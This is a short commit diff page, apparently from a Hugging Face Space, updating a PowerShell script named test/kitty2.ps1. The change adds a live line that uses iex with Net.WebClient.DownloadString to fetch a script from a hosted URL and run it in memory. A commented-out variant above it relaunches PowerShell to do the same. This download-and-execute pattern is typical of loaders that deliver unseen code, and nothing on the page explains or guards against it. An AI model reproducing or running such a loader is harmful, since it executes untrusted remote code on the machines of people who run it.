Spaces:
Runtime error
Runtime error
Update test/kitty2.ps1
Browse files- test/kitty2.ps1 +1 -1
test/kitty2.ps1
CHANGED
@@ -7,7 +7,7 @@
|
|
7 |
if($host.Name -ne "ConsoleHost")
|
8 |
{
|
9 |
#Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1'')'
|
10 |
-
iex (New-Object Net.WebClient).DownloadString('
|
11 |
return
|
12 |
}
|
13 |
|
|
|
7 |
if($host.Name -ne "ConsoleHost")
|
8 |
{
|
9 |
#Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1'')'
|
10 |
+
iex (New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1')
|
11 |
return
|
12 |
}
|
13 |
|